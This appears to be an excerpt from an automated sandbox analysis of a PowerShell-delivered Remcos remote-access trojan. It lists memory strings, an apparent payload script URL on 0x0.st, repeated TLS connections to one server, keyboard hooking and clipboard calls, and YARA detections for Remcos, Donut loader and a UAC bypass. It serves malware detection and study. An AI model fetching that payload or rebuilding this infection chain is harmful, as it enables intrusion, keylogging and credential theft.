                Source: powershell.exe, 0000002C.00000002.2488709838.0000000007606000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro9
                Source: powershell.exe, 00000037.00000002.2979667593.00000000072DD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microJ
                Source: powershell.exe, 0000000A.00000002.1663974960.0000000008B48000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1663209869.0000000008A70000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1821567285.00000000085CC000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 0000001B.00000002.1976169580.00000000095AC000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 00000022.00000002.2153331440.000000000930C000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 00000027.00000002.2318491679.000000000916C000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 0000002C.00000002.2531189391.0000000008E9C000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 00000031.00000002.2795920672.0000000008B1C000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 0000003C.00000002.3350777711.0000000008C8C000.00000002.10000000.00040000.00000000.sdmp, powershell.exe, 00000041.00000002.3951857716.00000000095DC000.00000002.10000000.00040000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp/C
                Source: powershell.exe, 0000000A.00000002.1642045536.0000000005A4B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 0000000A.00000002.1637213634.0000000004B34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1636433661.0000000000B1E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 0000000A.00000002.1637213634.00000000049E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1769697308.0000000004445000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1902212702.0000000005015000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2049964859.0000000005455000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2186795010.0000000005215000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2361040368.0000000004EB5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2512716697.0000000004B3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2650095673.0000000004AE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003C.00000002.2852878348.0000000004D3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.3023708129.0000000004FAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.3169331212.0000000004905000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 0000000A.00000002.1637213634.0000000004B34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1636433661.0000000000B1E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000011.00000002.1693956126.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.ebuddy.com
                Source: powershell.exe, 00000011.00000002.1693956126.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.imvu.com
                Source: powershell.exe, 00000011.00000002.1693956126.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                Source: powershell.exe, 00000011.00000002.1693956126.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.imvu.comr
                Source: powershell.exe, 0000000A.00000002.1661001486.0000000008260000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.c
                Source: powershell.exe, 00000016.00000002.1812266786.0000000006DB3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.t1
                Source: powershell.exe, 0000000D.00000002.1698679137.0000000002C64000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://www.nirsoft.net
                Source: powershell.exe, 00000011.00000002.1693956126.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.nirsoft.net/
                Source: powershell.exe, 0000000A.00000002.1637213634.0000000004B34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1769697308.0000000004595000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1902212702.0000000005164000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2049964859.00000000055A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2186795010.0000000005364000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2361040368.0000000005004000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2512716697.0000000004C84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2650095673.0000000004C34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003C.00000002.2852878348.0000000004E84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.3023708129.00000000050F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.3169331212.0000000004A54000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://0x0.st
                Source: powershell.exe, 00000046.00000002.3169331212.0000000004A54000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://0x0.st/8KuV.ps1
                Source: powershell.exe, 00000016.00000002.1812266786.0000000006D60000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://0x0.st/8KuV.ps1l?
                Source: powershell.exe, 0000000A.00000002.1637213634.00000000049E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1769697308.0000000004445000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1902212702.0000000005015000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2049964859.0000000005455000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2186795010.0000000005215000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2361040368.0000000004EB5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2512716697.0000000004B3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2650095673.0000000004AE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003C.00000002.2852878348.0000000004D3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.3023708129.0000000004FAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.3169331212.0000000004905000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
                Source: powershell.exe, 0000000A.00000002.1642045536.0000000005A4B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
                Source: powershell.exe, 0000000A.00000002.1642045536.0000000005A4B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 0000000A.00000002.1642045536.0000000005A4B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 0000000A.00000002.1637213634.0000000004B34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1636433661.0000000000B1E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 0000000D.00000002.1699411803.000000000310C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1699267968.00000000030C8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: powershell.exe, 0000000D.00000002.1699411803.000000000310C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: powershell.exe, 0000000D.00000002.1699411803.000000000310C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: powershell.exe | String found in binary or memory: https://login.yahoo.com/config/login
                Source: powershell.exe, 0000000A.00000002.1642045536.0000000005A4B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
                Source: powershell.exe, 00000011.00000002.1693956126.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.google.com
                Source: powershell.exe | String found in binary or memory: https://www.google.com/accounts/servicelogin
                Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49722
                Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49721
                Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49725 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49729 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49719 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49719
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49718
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717
                Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
                Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49728 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49729
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49728
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49727
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49726
                Source: unknown | Network traffic detected: HTTP traffic on port 49718 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49725
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49723
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49708 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49710 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49717 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49718 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49719 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49721 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49722 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49723 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49724 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49725 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49726 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49727 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49728 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49729 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49730 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49731 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49732 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49733 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.9:49734 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Windows user hook set: 0 keyboard low level C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_0041183A OpenClipboard,GetLastError,DeleteFileW
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 13_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 15_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 15_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard
                Source: Yara match | File source: 10.2.powershell.exe.8a71288.4.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 10.2.powershell.exe.8a71288.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000A.00000002.1663974960.0000000008B48000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.1663209869.0000000008A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7164, type: MEMORYSTR

                E-Banking Fraud

                Source: Yara match | File source: 10.2.powershell.exe.8a71288.4.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 10.2.powershell.exe.8a71288.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000003C.00000002.3315313393.00000000086E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000031.00000002.2500631742.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.1661372685.00000000082E3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000002C.00000002.2493453882.0000000007665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.1663974960.0000000008B48000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.1663209869.0000000008A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000041.00000002.3913041557.0000000008AD6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.1636313804.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000050.00000002.3570365875.0000000000526000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000046.00000002.4032457091.0000000006FD6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000001B.00000002.1961674745.000000000780D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000001B.00000002.1970540185.0000000008A9A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000016.00000002.1821567285.00000000085C7000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000003C.00000002.3248272097.00000000073B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000027.00000002.2318491679.0000000009167000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000016.00000002.1818907965.000000000808D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000037.00000002.3021043364.000000000859D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000031.00000002.2795920672.0000000008B17000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000003C.00000002.3350777711.0000000008C87000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000022.00000002.2130722447.00000000079F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000022.00000002.2153331440.0000000009307000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000046.00000002.4173144196.0000000008887000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000001B.00000002.1976169580.00000000095A7000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000022.00000002.2044377742.000000000347B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000041.00000002.3951857716.00000000095D7000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000002C.00000002.2531189391.0000000008E97000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7164, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6324, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6580, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: powershell.exe PID: 5732, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: powershell.exe PID: 5288, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: powershell.exe PID: 4780, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6556, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: powershell.exe PID: 2528, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3808, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: powershell.exe PID: 5472, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: powershell.exe PID: 1808, type: MEMORYSTR
                Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Source: powershell.exe | Process created: 42
                Source: cmd.exe | Process created: 48

                System Summary

                Source: 10.2.powershell.exe.8a71288.4.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 10.2.powershell.exe.8a71288.4.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 10.2.powershell.exe.8a71288.4.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 10.2.powershell.exe.8a71288.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 10.2.powershell.exe.8a71288.4.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 10.2.powershell.exe.8a71288.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 0000003C.00000002.3037711043.0000000005E4B000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000046.00000002.4179942082.000000000AFF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000046.00000002.3558882823.0000000005A1C000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 0000000A.00000002.1664350212.000000000984B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 0000001B.00000002.1930013571.0000000006091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 0000001B.00000002.1932265209.0000000006131000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000027.00000002.2318491679.000000000916C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0000000A.00000002.1666563849.000000000A3D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 0000000A.00000002.1663974960.0000000008B48000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0000000A.00000002.1663209869.0000000008A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000016.00000002.1821567285.00000000085CC000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000031.00000002.2611623646.0000000005C4B000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 0000002C.00000002.2531189391.0000000008E9C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0000001B.00000002.1976587463.000000000A541000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000050.00000002.4176174475.00000000055DE000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000046.00000002.3519219272.000000000597C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000027.00000002.2239205630.000000000632B000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 0000000A.00000002.1672116393.000000000A836000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000022.00000002.2082788404.00000000064CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 0000004B.00000002.3963998380.0000000005A85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000027.00000002.2235153189.000000000628A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 0000004B.00000002.4003774711.0000000005AED000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000041.00000002.3324693683.00000000060BB000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 0000001B.00000002.1976169580.00000000095AC000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000016.00000002.1789068655.00000000054C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000050.00000002.4142249719.000000000553E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000041.00000002.3951857716.00000000095DC000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000037.00000002.2811950232.0000000005BFC000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000037.00000002.2798234763.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 0000003C.00000002.3020737620.0000000005DAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 0000003C.00000002.3350777711.0000000008C8C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000022.00000002.2153331440.000000000930C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0000003C.00000002.3354412418.000000000A3F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000031.00000002.2605482729.0000000005BAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000031.00000002.2795920672.0000000008B1C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000046.00000002.4173144196.000000000888C000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000016.00000002.1822042034.0000000009DA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000022.00000002.2085983779.000000000656F000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000041.00000002.3295240918.000000000601B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: 00000016.00000002.1790510884.0000000005560000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 7164, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 7164, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 6324, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 6324, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 6580, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 6580, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 5732, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 5732, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 5288, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 5288, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 4780, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
